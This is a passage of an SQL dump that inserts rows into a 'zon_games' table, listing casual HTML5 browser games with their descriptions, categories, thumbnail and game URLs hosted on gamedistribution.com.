(818, 'Cute Road', 'Cute Road, are you ready to go on a challenging road? Do you know, your vehicle can jump from obstacles. In this game, you will understand what you can do with this capable vehicle and what kind of driver it is. Master or beginner? Watch out for different obstacles and other vehicles that will come along the way! Try to reach the highest score.', 'https://img.gamedistribution.com/f16f1e3b528b49dbb74b1535206422b7-512x384.jpeg', 'https://html5.gamedistribution.com/f16f1e3b528b49dbb74b1535206422b7/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/f16f1e3b528b49dbb74b1535206422b7-1280x550.jpeg', 0, '');
INSERT INTO `zon_games` (`id`, `game_name`, `game_description`, `game_image_url`, `game_url`, `game_published`, `game_category`, `game_status`, `game_played`, `game_banner_url`, `is_featured`, `game_card_size`) VALUES
(819, 'Tropical Tennis', 'Tropical Tennis is fun addictive hyper casual sports game.Click and drag the mouse to hit the ball in all directions to beat the opponent.', 'https://img.gamedistribution.com/7ec1216a890342d5919f4c2f18b507f0-512x384.jpeg', 'https://html5.gamedistribution.com/7ec1216a890342d5919f4c2f18b507f0/', '0', 'Casual', 0, 0, '', 0, ''),
(820, 'Marbleous 3D', 'Move all billiards to the hole, and the white ball finally enters the hole. If the white ball enters the hole ahead of time, or other balls hit the wall, the game will be over.', 'https://img.gamedistribution.com/8e4080e4a02a4983835bcca678ae2d6b-512x384.jpeg', 'https://html5.gamedistribution.com/8e4080e4a02a4983835bcca678ae2d6b/', '0', 'Casual', 0, 0, '', 0, ''),
(821, 'Sushi Heaven Difference', 'Now it\'s time for wonderful game that\'s called Sushi Heaven Difference, let\'s have fun! Behind these pictures are small differences. Can you find them? They are fun designs for you to play with. A game that is fun and educational because it will help you improve your observation and concentration skills. You have 10 levels and 7 differences, for each level you have one minute to finish the same.', 'https://img.gamedistribution.com/d083fbb014444867b44e0997f7d9f2ea-512x384.jpeg', 'https://html5.gamedistribution.com/d083fbb014444867b44e0997f7d9f2ea/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/d083fbb014444867b44e0997f7d9f2ea-1280x550.jpeg', 0, ''),
(822, 'Running Crowd City', 'Become the biggest crowd in town!  \nGather people accross the city and crush your opponents with your overwhelming leadership!', 'https://img.gamedistribution.com/651f442b3dcf45a79f75c5d24c34c34c-512x384.jpeg', 'https://html5.gamedistribution.com/651f442b3dcf45a79f75c5d24c34c34c/', '0', 'Agility', 0, 0, '', 0, ''),
(823, 'Car Backwheel', 'You have 20 levels. Select 1 of 5 wheels and go to adventure. Beware of spikes and get over obstacles to reach your goal', 'https://img.gamedistribution.com/835392076de84d0cab7b5deabbc3f6af-512x384.jpeg', 'https://html5.gamedistribution.com/835392076de84d0cab7b5deabbc3f6af/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/835392076de84d0cab7b5deabbc3f6af-1280x720.jpeg', 0, ''),
(824, 'Pixel Circuit Racing Car Crash', 'Pixel Circuit Racing Car Crash is a 3d racing game, tap the screen to change lanes. Avoid collisions with another car.', 'https://img.gamedistribution.com/ed72b739c17a484189cc3e4541b6775f-512x512.jpeg', 'https://html5.gamedistribution.com/ed72b739c17a484189cc3e4541b6775f/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/ed72b739c17a484189cc3e4541b6775f-1280x720.jpeg', 0, ''),
(825, 'Halloween 2019 Slide', 'Play this slide puzzle games of halloween. It\'s include 3 images and 3 modes to play.                                                    ', 'https://img.gamedistribution.com/2d43f74eb5b34435a59953b8ca9bbe19-512x384.jpeg', 'https://html5.gamedistribution.com/2d43f74eb5b34435a59953b8ca9bbe19/', '0', 'Puzzle', 0, 0, '', 0, ''),
(826, 'Halloween Hidden Pumpkins', 'In this game Halloween Hidden Pumpkins there are pictures that are mysterious and scary. Find out the hidden pumpkins in the specified images. Each level has 10 hidden pumpkins. There are 6 levels in total. The time is limited so be fast and find all hidden objects before time runs out. Clicking in the wrong place several times reduces the time by an additional 5 seconds. So, if you are ready start the game and have fun!', 'https://img.gamedistribution.com/91a8b6539d3d424889c2148b92e17a26-512x384.jpeg', 'https://html5.gamedistribution.com/91a8b6539d3d424889c2148b92e17a26/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/91a8b6539d3d424889c2148b92e17a26-1280x550.jpeg', 0, ''),
(827, 'Scary Halloween Party', 'Scary Halloween Party is a free online skill and hidden object game. Find out the hidden stars in the specified images. Each level has 10 hidden stars. There are 6 levels in total. The time is limited so be fast and find all hidden objects before time runs out. Clicking in the wrong place several times reduces the time by an additional 5 seconds. So, if you are ready start the game and have fun!', 'https://img.gamedistribution.com/f16d560cf9214a46abccb92ae11952f5-512x384.jpeg', 'https://html5.gamedistribution.com/f16d560cf9214a46abccb92ae11952f5/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/f16d560cf9214a46abccb92ae11952f5-1280x720.jpeg', 0, ''),
(828, 'Kiko Adventure', 'kiko adventure is a html5 platformer game, collect fruits to get scores and more bottles to unlock levels', 'https://img.gamedistribution.com/87264383883d4842a116b607c30a3c7f-512x384.jpeg', 'https://html5.gamedistribution.com/87264383883d4842a116b607c30a3c7f/', '0', 'Adventure', 0, 0, '', 0, ''),
(829, 'Jungle Survival Jurassic Park', 'Join in the tremendous awesome multiplayer and campaign Jurassic park jungle. Here you will fight with different models of dinosaurs from million years ago but is back in the present so survive with your friends in multiplayer or try our offline campaign and enjoy running and shooting there. Have Fun.', 'https://img.gamedistribution.com/cc4ef13b4dc24637ac47f19a021dc66e-512x384.jpeg', 'https://html5.gamedistribution.com/cc4ef13b4dc24637ac47f19a021dc66e/', '0', 'Simulation', 0, 0, '', 0, ''),
(830, 'Falling Balls', 'Falling Balls features:\n- multiple levels\n- fun gameplay\n- good physics', 'https://img.gamedistribution.com/b2c797409bdf438e8738d5a89ca70cac-1280x550.jpeg', 'https://html5.gamedistribution.com/b2c797409bdf438e8738d5a89ca70cac/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/b2c797409bdf438e8738d5a89ca70cac-512x384.jpeg', 0, ''),
(831, 'Food Truck Differences', 'In this game you need to find seven differences in each picture. There is ten images with food trucks with some differences in it. Try to find all differences for given time. You have time of 2 minutes in each level. Pass all 10 levels and have good fun.', 'https://img.gamedistribution.com/b1eddbe074934ad4938ef88a20552e60-512x384.jpeg', 'https://html5.gamedistribution.com/b1eddbe074934ad4938ef88a20552e60/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/b1eddbe074934ad4938ef88a20552e60-1280x720.jpeg', 0, ''),
(832, 'Zigzag Ball', 'Zigzag Ball is fun addictive hyper-casual game.Move the ball on zigzag road and collect as many gems as you can .\nHow to play:\nMouse click or press space to move the ball.', 'https://img.gamedistribution.com/16e251558278411fa16de8a0cda87e56-512x384.jpeg', 'https://html5.gamedistribution.com/16e251558278411fa16de8a0cda87e56/', '0', 'Casual', 0, 0, '', 0, ''),
(833, 'Death Alley', 'Death Alley, you need to stop the zombies from passing you, you need to destroy them all with your deadly chain!\n', 'https://img.gamedistribution.com/60408f6621bb4ee5bb5fb36680f81653-512x384.jpeg', 'https://html5.gamedistribution.com/60408f6621bb4ee5bb5fb36680f81653/', '0', 'Shooter', 0, 0, 'https://img.gamedistribution.com/60408f6621bb4ee5bb5fb36680f81653-1280x550.jpeg', 0, ''),
(834, 'CDrone Survival', 'Using the drone you will attack other robots in space. You must find the best way to deal with all of them. You must be quick enough to react to all their attacks. Just start playing, have fun and don\'t be afraid of anything and anyone!', 'https://img.gamedistribution.com/175ed26a6aa346e8985d08b3e5272331-512x384.jpeg', 'https://html5.gamedistribution.com/175ed26a6aa346e8985d08b3e5272331/', '0', 'Shooter', 0, 0, 'https://img.gamedistribution.com/175ed26a6aa346e8985d08b3e5272331-1280x550.jpeg', 0, ''),
(835, 'Modern Home Difference', 'Modern Home Difference is interesting kids game and it\'s time for you to have fun!In this game you need to find the differences in these funny kids images. Behind these pictures are small differences. Can you find them? They are fun designs for you to play with. A game that is fun and educational because it will help you improve your observation and concentration skills. You have 10 levels and 7 differences, for each level you have one minute to finish the same. Have fun!', 'https://img.gamedistribution.com/81e4ce34bfbc49198687494f190eb566-512x384.jpeg', 'https://html5.gamedistribution.com/81e4ce34bfbc49198687494f190eb566/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/81e4ce34bfbc49198687494f190eb566-1280x550.jpeg', 0, ''),
(836, 'Cube Paint 2019', 'Your goal is to paint all of the black blocks.', 'https://img.gamedistribution.com/7e56668f45374d53a8b2b3a9f3d2712c-512x384.jpeg', 'https://html5.gamedistribution.com/7e56668f45374d53a8b2b3a9f3d2712c/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/7e56668f45374d53a8b2b3a9f3d2712c-1280x720.jpeg', 0, ''),
(837, 'Master Sushi', 'It’s endless type game, you need move the board to hit  ball, breaking bricks. Do not let the bricks touch  ground and  board. Every time speed increase, keep your mind.\nHow to play:\nUse left and right arrow keys to move the board.\nPress space to shoot the ball\nor \nClick mouse left button to play the game.\n', 'https://img.gamedistribution.com/e93d179a504d4fa28441f04733b2f70b-512x384.jpeg', 'https://html5.gamedistribution.com/e93d179a504d4fa28441f04733b2f70b/', '0', 'Casual', 0, 0, '', 0, ''),
(838, 'Cute Halloween Dressup', 'The enchantment world will hold an amazing gathering to observe Halloween\'s Day. As a youthful and clearly captivating witch, Molly needs great and amusing halloween dress up.Enjoy it!', 'https://img.gamedistribution.com/daaf7fcde7ad4ac1845f5211672aaa59-512x512.jpeg', 'https://html5.gamedistribution.com/daaf7fcde7ad4ac1845f5211672aaa59/', '0', 'Dress-up', 0, 0, 'https://img.gamedistribution.com/daaf7fcde7ad4ac1845f5211672aaa59-1280x720.jpeg', 0, ''),
(839, 'Air War Plane Flight Simulator Challenge 3D', 'Ever wanted to fly a C130? This is your chance to be a pilot and perform missions. \nShow your amazing skills with the latest Flight Simulator and fly a C130 in the Mountains. You will have to complete various breath0taking missions to collect points and we are telling you, it’s not that easy, so brace yourself and get into it right away. ', 'https://img.gamedistribution.com/5e5a766c8b7d40f2b8fb71b5a30ee5bb-512x384.jpeg', 'https://html5.gamedistribution.com/5e5a766c8b7d40f2b8fb71b5a30ee5bb/', '0', 'Simulation', 0, 0, 'https://img.gamedistribution.com/5e5a766c8b7d40f2b8fb71b5a30ee5bb-1280x720.jpeg', 0, ''),
(840, 'Sea Treasure', 'sea treasure is a match 3 game, drag and drop items and match them to 3 or more to get a score\n', 'https://img.gamedistribution.com/6b87f156e17844b0b936b4c4516186a9-512x384.jpeg', 'https://html5.gamedistribution.com/6b87f156e17844b0b936b4c4516186a9/', '0', 'Match-3', 0, 0, '', 0, ''),
(841, 'Hallowen Parkour', 'Hallowen Parkour is a 3D game in which you have to jump and not fall. You have to reach the end !!!', 'https://img.gamedistribution.com/31ffba23080347778039ae1e15755d2f-512x384.jpeg', 'https://html5.gamedistribution.com/31ffba23080347778039ae1e15755d2f/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/31ffba23080347778039ae1e15755d2f-1280x550.jpeg', 0, ''),
(842, 'Hidden Sea Treasure', 'In this game called Hidden Sea Treasure that belong in genre of hidden objects games, you job is to find all nine hidden treasures in the image. We offer you six images and you need to pass all images to win in this game.', 'https://img.gamedistribution.com/ebf04ba751cb465f908854a30753e561-512x384.jpeg', 'https://html5.gamedistribution.com/ebf04ba751cb465f908854a30753e561/', '0', 'Adventure', 0, 0, 'https://img.gamedistribution.com/ebf04ba751cb465f908854a30753e561-1280x720.jpeg', 0, ''),
(843, 'Clawdeen Wolf flirting Dressup', 'Monster Wolf is a fierce feisty fury Fashionista! She loves to look hot as she tends to do a lot of flirting around those Monster High ghouls! She likes to look confident and alluring so I know you girls will not let her down! With your amazing fashion style skills and her brown skin, golden eyes, and curly auburn hair she will look a million dollars!', 'https://img.gamedistribution.com/ead6e8567fd2414e86520edd92930406-512x384.jpeg', 'https://html5.gamedistribution.com/ead6e8567fd2414e86520edd92930406/', '0', 'Dress-up', 0, 0, '', 0, ''),
(844, 'Lexus LF30 Electrified Puzzle', 'Play with 6 images in this perfect jigsaw puzzle game: Lexus LF-30 Electrified. All images is with the lexus lf030 electrified. Solve all puzzles and keep your brain sharp. You have four modes for each picture, 16 pieces, 36 pieces, 64 pieces and 100 pieces. Enjoy and have fun.', 'https://img.gamedistribution.com/7a1a96234e5c4333a8fb28d2570e75ba-512x384.jpeg', 'https://html5.gamedistribution.com/7a1a96234e5c4333a8fb28d2570e75ba/', '0', 'Puzzle', 0, 0, '', 0, ''),
(845, 'Blasty Bottles', 'Blasty Bottles is an addictive bottle shooting game, where you need to knock down bottles placed at different positions, using a powerful ball.', 'https://img.gamedistribution.com/17f20ae9025846208ac57c808ae61637-512x384.jpeg', 'https://html5.gamedistribution.com/17f20ae9025846208ac57c808ae61637/', '0', 'Casual', 0, 0, '', 0, ''),
(846, 'Icing On The Cake', 'Delicious cake waiting for you to draw beautiful cream~ you can do whatever you like or follow the order! But if you want to unlock more cake mold, you need to be more like that.', 'https://img.gamedistribution.com/13ce1fdd7002402bbf08b3f28a10a2c7-512x384.jpeg', 'https://html5.gamedistribution.com/13ce1fdd7002402bbf08b3f28a10a2c7/', '0', 'Art', 0, 0, '', 0, ''),
(847, 'Box Adventure', 'Box Adventure – is a simple and adventure based game!\nHelp the little box find its father who was abducted by strangers in a spaceship.', 'https://img.gamedistribution.com/f539ba2b63264e0ba2d8c815523afd9e-512x384.jpeg', 'https://html5.gamedistribution.com/f539ba2b63264e0ba2d8c815523afd9e/', '0', 'Adventure', 0, 0, 'https://img.gamedistribution.com/f539ba2b63264e0ba2d8c815523afd9e-1280x550.jpeg', 0, ''),
(848, 'Circus Mystery', 'It’s endless type game, you need to click on the knife to get into the circle.Don’t throw into else knife. You will  be immersed in the incredible atmosphere of the holiday Circus. \n\nThe rotations of the circle is always changing. Enjoy advance, keep your mind! ', 'https://img.gamedistribution.com/c9eab2dcf7f3459180a11f9662765e8e-512x384.jpeg', 'https://html5.gamedistribution.com/c9eab2dcf7f3459180a11f9662765e8e/', '0', 'Casual', 0, 0, '', 0, ''),
(849, 'Street Basketball', 'So many moving basketball hoops are requiring a true professional. Put the balls through as many basketball hoops as you can and aim for the bonus hoops such as multiple balls, time and other powerups to put things on fire!', 'https://img.gamedistribution.com/46aa8560dcc4459fa10782188cd54e26-512x384.jpeg', 'https://html5.gamedistribution.com/46aa8560dcc4459fa10782188cd54e26/', '0', 'Basketball', 0, 0, 'https://img.gamedistribution.com/46aa8560dcc4459fa10782188cd54e26-1280x550.jpeg', 0, ''),
(850, 'Bricks Jenga 3D', 'Jenga is game based on physics. Once the tower is built, the Player number one gets the first move. Moving in Jenga consists of taking one and only one block from any level of the tower, and placing it on the topmost level to complete it.', 'https://img.gamedistribution.com/7f21289af8f745038aeb72050a1e8a64-512x384.jpeg', 'https://html5.gamedistribution.com/7f21289af8f745038aeb72050a1e8a64/', '0', 'Casual', 0, 0, '', 0, ''),
(851, 'Cat Candy Run', 'The alone hero cat is running and trying to gain most possible donuts and desserts in Candy world.Kitten  must be ready for Cat Candy Run.', 'https://img.gamedistribution.com/1407a9183780441abcbde02540762cb3-1280x550.jpeg', 'https://html5.gamedistribution.com/1407a9183780441abcbde02540762cb3/', '0', 'Agility', 0, 0, 'https://img.gamedistribution.com/1407a9183780441abcbde02540762cb3-512x384.jpeg', 0, ''),
(852, 'Halloween Painting Slide', 'Play this slide puzzle games of halloween painting. It\'s include 3 images and 3 modes to play.                                       ', 'https://img.gamedistribution.com/bfd0d98d405a42e9b08842491a2c007c-512x384.jpeg', 'https://html5.gamedistribution.com/bfd0d98d405a42e9b08842491a2c007c/', '0', 'Puzzle', 0, 0, '', 0, ''),
(853, 'Arcade Car Drift', 'Arcade Car Drift features:\n- multiple cars to play\n- 2 environments\n- good physics', 'https://img.gamedistribution.com/d99ae6e8df8e419fba8dc1217e60ff0e-1280x550.jpeg', 'https://html5.gamedistribution.com/d99ae6e8df8e419fba8dc1217e60ff0e/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/d99ae6e8df8e419fba8dc1217e60ff0e-512x384.jpeg', 0, ''),
(854, 'Owl Coloring', 'Owl Coloring includes 8 different images of owls that kids can choose from and color them as they like. Use any color you like and then you can show the results to your family and friends with clicking the camera to download the image! Have fun!', 'https://img.gamedistribution.com/9e19c766ca7e49eeb9c8dca7a56d201c-512x384.jpeg', 'https://html5.gamedistribution.com/9e19c766ca7e49eeb9c8dca7a56d201c/', '0', 'Art', 0, 0, 'https://img.gamedistribution.com/9e19c766ca7e49eeb9c8dca7a56d201c-1280x550.jpeg', 0, ''),
(855, 'Halloween Magic Tiles', 'Try to tap all of the orange tiles in this fun Halloween themed piano playing game.', 'https://img.gamedistribution.com/b16229a3941d4952b0462837a6bff409-512x384.jpeg', 'https://html5.gamedistribution.com/b16229a3941d4952b0462837a6bff409/', '0', 'Agility', 0, 0, '', 0, ''),
(856, 'Happy Glass Halloween Edition', 'Happy Glass Halloween Edition is here enjoy this Halloween with this famous game happy glass.Fill the glass with blood and make the glass happy.If the glass doesn\'t get the enough amount of blood he will be sad so make the glass happy and enjoy the 100 levels .', 'https://img.gamedistribution.com/fe30db9f251c42b2817950c48237f957-512x384.jpeg', 'https://html5.gamedistribution.com/fe30db9f251c42b2817950c48237f957/', '0', 'Casual', 0, 0, '', 0, ''),
(857, 'Mazda 3 Sedan Puzzle', 'Play with 6 images in this perfect jigsaw puzzle game: Mazda 3 Sedan Puzzle. All images is with the mazda 3 sedan. Solve all puzzles and keep your brain sharp. You have four modes for each picture, 16 pieces, 36 pieces, 64 pieces and 100 pieces. Enjoy and have fun.', 'https://img.gamedistribution.com/34cb95436eac460b9c78b2ed08ad6055-512x384.jpeg', 'https://html5.gamedistribution.com/34cb95436eac460b9c78b2ed08ad6055/', '0', 'Puzzle', 0, 0, '', 0, ''),
(858, 'Cloud Flight', 'It’s endless type game you need dodge rocket . Collect coins to get points.\nHow to play:\nUse WS or Up or Down arrow keys to move.', 'https://img.gamedistribution.com/01a0f28d6ec2442fba4d4ea35432ed9e-512x512.jpeg', 'https://html5.gamedistribution.com/01a0f28d6ec2442fba4d4ea35432ed9e/', '0', 'Casual', 0, 0, '', 0, ''),
(859, 'Kangaroo Mouse', 'Kangaroo Mouse is a logic game where players build ramps to help the mouse get his dinner.', 'https://img.gamedistribution.com/50314fc656c249c9abb2ea4df606a724-512x384.jpeg', 'https://html5.gamedistribution.com/50314fc656c249c9abb2ea4df606a724/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/50314fc656c249c9abb2ea4df606a724-1280x550.jpeg', 0, ''),
(860, 'Xtreme Speed Stunts BMX', 'Are you ready for Xtreme Speed Stunts BMX GM? Well... you can play this game and see if you are good with your virtual BMX.  \nYou are a BMX RIDER and you can do tricks on your Moto motor bike, race your way around all the tracks in this fun game madalin super romania stunt 2 game the stick man loves motorsport so hes biking over dirt and tar on his motor cycle, so start racing with lots of action and cycle your way to Bike Heaven.  \n\n Have Fun!', 'https://img.gamedistribution.com/fed20211eb354e5395c5d802d291b9f8-512x384.jpeg', 'https://html5.gamedistribution.com/fed20211eb354e5395c5d802d291b9f8/', '0', 'Agility', 0, 0, '', 0, ''),
(861, 'Jumping Horses Champions', 'A game that mixes the arcade style with characteristics of simulation. The game brings the experiences and emotions of a show jumping match in an immersive environment.  The player can buy horses, which have their own attributes, and participates in challenging events to test its skills. Several features were added for this version.\nHow to play:\nW or Up Arrow key to increase the speed.\nS or Down Arrow key to decrease the speed.\nSpace for Jump.\nAD or Left or Right Arrow keys to move the horse', 'https://img.gamedistribution.com/0c35ce8507584ed19519a6aa6de65c26-512x384.jpeg', 'https://html5.gamedistribution.com/0c35ce8507584ed19519a6aa6de65c26/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(862, 'Adam and Eve Astronaut', 'Help Adam to fly away in a spaceship.', 'https://img.gamedistribution.com/1a7b92f3c6ef4a1a989d358ce9ca54cf-512x384.jpeg', 'https://html5.gamedistribution.com/1a7b92f3c6ef4a1a989d358ce9ca54cf/', '0', 'Adventure', 0, 0, 'https://img.gamedistribution.com/1a7b92f3c6ef4a1a989d358ce9ca54cf-1280x550.jpeg', 0, ''),
(863, 'Basket Champs', 'Basket Champs is a thrilling take on the classical free shots tournament. This basketball championship is hold in the same universe of Foot Chinko, so don’t be surprised if weird stuff happens.', 'https://img.gamedistribution.com/9346ec9f43664c4691fe55e8a5b2303b-512x384.jpeg', 'https://html5.gamedistribution.com/9346ec9f43664c4691fe55e8a5b2303b/', '0', 'Basketball', 0, 0, 'https://img.gamedistribution.com/9346ec9f43664c4691fe55e8a5b2303b-1280x550.jpeg', 0, ''),
(864, 'Woody Block Hexa Puzzle Game', 'Block Hexa is a Woody Puzzle game.A fun Block Hexa Puzzle game.\nMove Block Hexa to fill up the square and collect the wood block Puzzle pieces to level up!', 'https://img.gamedistribution.com/a60ae5fd1c3e414996a2245db1a0205a-512x512.jpeg', 'https://html5.gamedistribution.com/a60ae5fd1c3e414996a2245db1a0205a/', '0', 'Puzzle', 0, 0, '', 0, ''),
(865, 'Halloween Blocks Collaspse Delux', 'Collapse halloween blocks by connecting 2 or more similar blocks. Make large chains to get power-ups. Collapse 7 blocks or more to get a bomb. More points are awarded as larger connections are made.', 'https://img.gamedistribution.com/16bb4530986a41278f460e962505cc03-512x384.jpeg', 'https://html5.gamedistribution.com/16bb4530986a41278f460e962505cc03/', '0', 'Puzzle', 0, 0, '', 0, ''),
(866, 'Spooky Bubble Shooter', 'It is a spooky bubble shooter game; collect the Golden \'Jack-o\'-lanterns\' hidden among the zombie\'s eyes. There will be 72 challenging levels.  In each level you will find a different challenge with \'different type of items and power ups\'. To complete a level you must collect all the \'Jack-o\'-lanterns\'. Shoot the eye on the board to make groups of 3 or more eyes of the same color. You must complete a level within allowed time. You will get better score if you complete the level early.', 'https://img.gamedistribution.com/e648747296814ee2afb3f8884599cec2-512x384.jpeg', 'https://html5.gamedistribution.com/e648747296814ee2afb3f8884599cec2/', '0', 'Bubble Shooter', 0, 0, 'https://img.gamedistribution.com/e648747296814ee2afb3f8884599cec2-1280x720.jpeg', 0, ''),
(867, 'Dark Ninja Adventure', 'This is not an ordinary ninja, in fact, this is a skillful collector of stars and the main goal of this ninja is to collect all the stars that are scattered in the scenario being invisible.\nYour job is to take on the role of the ninja, start the adventure and as soon as you get all the stars, you will open the portal, and only need to enter the portal that will appear so you can finish the level.\n', 'https://img.gamedistribution.com/88ed3966c8074c04bdf50928d0434fa9-512x384.jpeg', 'https://html5.gamedistribution.com/88ed3966c8074c04bdf50928d0434fa9/', '0', 'Adventure', 0, 0, 'https://img.gamedistribution.com/88ed3966c8074c04bdf50928d0434fa9-1280x550.jpeg', 0, ''),
(868, 'Ninja ', 'Ninja is a top down game, you have to pass a few obstacles to reach the finish and collect coins to get a score', 'https://img.gamedistribution.com/8aa64f2d1e1d406f9fe6e3d665a760ac-512x384.jpeg', 'https://html5.gamedistribution.com/8aa64f2d1e1d406f9fe6e3d665a760ac/', '0', 'Casual', 0, 0, '', 0, ''),
(869, 'Soccer Challenge', 'Develop your passing skills in these brain-teasers known as Soccer challenge. Click the teammate (yellow dressed person) who you want to receive your pass, but make sure there is no opponent (red dressed person) in between you and your receiver, or he\'ll intercept the ball.   Try to goal in minimum passes to get better score. Complete all 30 levels to win this game.', 'https://img.gamedistribution.com/f9d53dd630e34c2a8587060e406d5fe3-512x384.jpeg', 'https://html5.gamedistribution.com/f9d53dd630e34c2a8587060e406d5fe3/', '0', 'Football', 0, 0, 'https://img.gamedistribution.com/f9d53dd630e34c2a8587060e406d5fe3-1280x550.jpeg', 0, ''),
(870, 'Cartoon Halloween Slide Puzzle', 'Play this slide puzzle games of halloween. It\'s include 3 images and 3 modes to play.                                                         ', 'https://img.gamedistribution.com/372e3678463e4e409dd53d2938678bbc-512x384.jpeg', 'https://html5.gamedistribution.com/372e3678463e4e409dd53d2938678bbc/', '0', 'Puzzle', 0, 0, '', 0, ''),
(871, 'Halloween Night Jigsaw', 'In this game you can solve images with Halloween nights. You can play with twelve images with Halloween and to have fun in Halloween Night. The music is interesting and little bit scary, so the playing of this game is very realistic and fun. Use mouse to drag the pieces into right position to get the image, or use your finger if you play on your cell phone.', 'https://img.gamedistribution.com/d7dde530ebba44c481f71ac094fb2321-512x384.jpeg', 'https://html5.gamedistribution.com/d7dde530ebba44c481f71ac094fb2321/', '0', 'Jigsaw', 0, 0, '', 0, ''),
(872, 'BTS Halloween Coloring Book', 'BTS Halloween Coloring Book is made for all halloween lovers and i know that small kids will love this game. Choose one of the images, pick some nice coloures and make your Halloween as colourfull as possible. Have fun playing.', 'https://img.gamedistribution.com/aa42eddbfb6040b6865b6f71c592d13d-512x384.jpeg', 'https://html5.gamedistribution.com/aa42eddbfb6040b6865b6f71c592d13d/', '0', 'Art', 0, 0, '', 0, ''),
(873, 'Pirate Knock', 'Shoot balls and knock this cubes. Pirate Knock with ball game. This game is very funny and simple. Destroy cubes of different order with a ball. Throw balls at structures to make them collapse but be careful not to exceed the allowed limit! When you hit cans with a ball, the target knocks down or explodes. Achieve the stage score to clear then challenge the next level.', 'https://img.gamedistribution.com/ec05af7b9e9b4d5c89789efca1db3614-512x384.jpeg', 'https://html5.gamedistribution.com/ec05af7b9e9b4d5c89789efca1db3614/', '0', 'Casual', 0, 0, '', 0, ''),
(874, 'Fast Food Match 3', 'Fast Food Match 3 – this cool game three in a row, in which you have to put the blocks of the same color in a series of three pieces or more to achieve the highest possible score, be careful to account the scale to the left did not fall too low, otherwise the game will be over. The game is done to a beautiful autumn style! Enjoy the game!', 'https://img.gamedistribution.com/8507a4422c344499842487c3e56aab67-512x384.jpeg', 'https://html5.gamedistribution.com/8507a4422c344499842487c3e56aab67/', '0', 'Match-3', 0, 0, 'https://img.gamedistribution.com/8507a4422c344499842487c3e56aab67-1280x550.jpeg', 0, ''),
(875, 'Baseball Classic', 'Baseball in two modes, classic that is the championship and the arcade mode where you must make points by bouncing the ball on the target and next to it.', 'https://img.gamedistribution.com/abb91e7ff1e5465bb21fe730a6602f3d-512x384.jpeg', 'https://html5.gamedistribution.com/abb91e7ff1e5465bb21fe730a6602f3d/', '0', 'Sports', 0, 0, 'https://img.gamedistribution.com/abb91e7ff1e5465bb21fe730a6602f3d-1280x550.jpeg', 0, ''),
(876, 'Dot Color Switch', 'Switch colors at the right time to match the dot color. Simple but very addicted. Which high score can you reach? Play now!', 'https://img.gamedistribution.com/5891a5d26bef4d96989adbddfc0a7706-512x384.jpeg', 'https://html5.gamedistribution.com/5891a5d26bef4d96989adbddfc0a7706/', '0', 'Casual', 0, 0, '', 0, ''),
(877, 'Halloween Memory', 'Halloween Memory is a HTML5 Memory game. Match all the identical cards before time runs out!', 'https://img.gamedistribution.com/48f768dcfef844d1a69c7b60cbeba51e-512x340.jpeg', 'https://html5.gamedistribution.com/48f768dcfef844d1a69c7b60cbeba51e/', '0', 'Puzzle', 0, 0, '', 0, ''),
(878, 'Rally Car 3D', 'Drive your car and avoid obstacles in the shortest time.', 'https://img.gamedistribution.com/0b67928c1cd14254ae4dc5af6c0cdfda-512x384.jpeg', 'https://html5.gamedistribution.com/0b67928c1cd14254ae4dc5af6c0cdfda/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(879, 'Monster High GiGi Grant Charisma Dressup', 'GIGI Grant is all about charisma and style but she is more of a comfy girl than a strutting diva, she likes to keep it fashionable but comfortable. She loves natural fabrics, especially silk, in bright pretty colors. Give GIGI a full makeover from face to outfit and she may even grant you a wish!', 'https://img.gamedistribution.com/5331f97bc7124cf0a1103fbdfeadece7-512x384.jpeg', 'https://html5.gamedistribution.com/5331f97bc7124cf0a1103fbdfeadece7/', '0', 'Dress-up', 0, 0, '', 0, ''),
(880, 'Zombie at Dentist', 'Young zombie girl is at dentist in this game, and of course, you are the dentist. So you need to fixed all teeth on this zombie girl. Use the equipment you have available for this job, and try to fix this girl.', 'https://img.gamedistribution.com/7e542f1eeea448da95763e04b94ca344-512x384.jpeg', 'https://html5.gamedistribution.com/7e542f1eeea448da95763e04b94ca344/', '0', 'Shooter', 0, 0, '', 0, ''),
(881, 'Air Dogs of WW2', 'Air Dogs of WW2 is the simulation of dog fight between war planes during World War 2. You can choose either Allied or Germans before going into the battle. Destroy the opponent base before they destroy yours with in the given time. The side which does the maximum damage will be the winner. Good Luck', 'https://img.gamedistribution.com/392a0ac5e2a54089a02a957fa6758105-512x384.jpeg', 'https://html5.gamedistribution.com/392a0ac5e2a54089a02a957fa6758105/', '0', 'Battle', 0, 0, '', 0, ''),
(883, 'Fantastic Pixel Car Racing Multiplayer', 'Are you ready for the great racing car multiplayer? Well now you have the chance to show your friends how good are your skills, you can get skills by playing offline and unlock new tracks and powerful cars.', 'https://img.gamedistribution.com/d48955a7fdee48dfaa3d38de345b3c54-512x384.jpeg', 'https://html5.gamedistribution.com/d48955a7fdee48dfaa3d38de345b3c54/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/d48955a7fdee48dfaa3d38de345b3c54-1280x720.jpeg', 0, ''),
(884, 'Monster High Twyla Dreamland Dressup', 'Twyla is the daughter of the Boogey Man. She is shy and misunderstood, hiding under normies\' beds to capture their nightmares rather than adding to them like her dad! She sends out good vibes, keeping us in a relaxing deep peaceful sleep, for this I think she deserves a dress and makeover don\'t you girls!?', 'https://img.gamedistribution.com/e9a99d4794b24987ae614a1ce6645c42-512x384.jpeg', 'https://html5.gamedistribution.com/e9a99d4794b24987ae614a1ce6645c42/', '0', 'Dress-up', 0, 0, '', 0, ''),
